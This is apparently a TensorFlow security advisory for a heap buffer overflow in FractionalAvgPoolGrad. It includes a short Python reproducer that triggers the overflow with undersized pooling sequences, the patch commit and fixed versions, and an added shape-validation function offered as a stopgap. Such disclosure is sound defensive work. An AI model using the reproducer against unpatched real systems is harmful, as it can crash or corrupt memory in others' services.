## TFSA-2021-067: Heap buffer overflow in `FractionalAvgPoolGrad`

### CVE Number
CVE-2021-29578

### Impact
The implementation of `tf.raw_ops.FractionalAvgPoolGrad` is vulnerable to a heap
buffer overflow:

```python
import tensorflow as tf

orig_input_tensor_shape = tf.constant([1, 3, 2, 3], shape=[4], dtype=tf.int64)
out_backprop = tf.constant([2], shape=[1, 1, 1, 1], dtype=tf.int64)
row_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64)
col_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64)


tf.raw_ops.FractionalAvgPoolGrad(
  orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop,
  row_pooling_sequence=row_pooling_sequence,
  col_pooling_sequence=col_pooling_sequence, overlapping=False)
```

The
[implementation](https://github.com/tensorflow/tensorflow/blob/dcba796a28364d6d7f003f6fe733d82726dda713/tensorflow/core/kernels/fractional_avg_pool_op.cc#L216)
fails to validate that the pooling sequence arguments have enough elements as
required by the `out_backprop` tensor shape.

### Patches
We have patched the issue in GitHub commit
[12c727cee857fa19be717f336943d95fca4ffe4f](https://github.com/tensorflow/tensorflow/commit/12c727cee857fa19be717f336943d95fca4ffe4f).

The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.

### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.

### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu
X-Team.
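
The missing validation described under Impact can be expressed as a caller-side shape check, shown here as an added example that is not TensorFlow's code or the patch itself. The function name is hypothetical, and it assumes an NHWC `out_backprop` and pooling sequences that hold one boundary more than the matching output dimension.

```python
# Added illustration, not TensorFlow code: reject FractionalAvgPoolGrad
# arguments whose pooling sequences are too short for out_backprop.
# Assumptions: out_backprop is laid out as [batch, rows, cols, depth] and a
# pooling sequence stores region boundaries, so it needs out_dim + 1 entries.

def check_fractional_avg_pool_grad_args(orig_input_shape, out_backprop_shape,
                                        row_pooling_sequence,
                                        col_pooling_sequence):
    """Return a list of problems; an empty list means the shapes agree."""
    problems = []
    if len(orig_input_shape) != 4:
        problems.append("orig_input_tensor_shape must have 4 elements, got %d"
                        % len(orig_input_shape))
    if len(out_backprop_shape) != 4:
        problems.append("out_backprop must be rank 4, got rank %d"
                        % len(out_backprop_shape))
        return problems  # rows/cols are undefined without a rank-4 shape

    _, out_rows, out_cols, _ = out_backprop_shape
    checks = (("row_pooling_sequence", row_pooling_sequence, out_rows),
              ("col_pooling_sequence", col_pooling_sequence, out_cols))
    for name, seq, out_dim in checks:
        if len(seq) < out_dim + 1:
            problems.append("%s needs at least %d elements for out_backprop "
                            "shape %s, got %d"
                            % (name, out_dim + 1, list(out_backprop_shape),
                               len(seq)))
    return problems


if __name__ == "__main__":
    # Shapes taken from the reproducer above: both sequences have one element,
    # while out_backprop has one row and one column.
    for line in check_fractional_avg_pool_grad_args(
            [1, 3, 2, 3], [1, 1, 1, 1], [1], [1]):
        print("rejected:", line)
    # Constructed consistent input: 2x2 output, three boundaries per axis.
    print(check_fractional_avg_pool_grad_args(
        [1, 3, 2, 3], [1, 2, 2, 3], [0, 1, 3], [0, 1, 2]))
```

Running a check like this before handing untrusted tensors to the raw op is a stopgap for deployments that cannot yet move to a patched release.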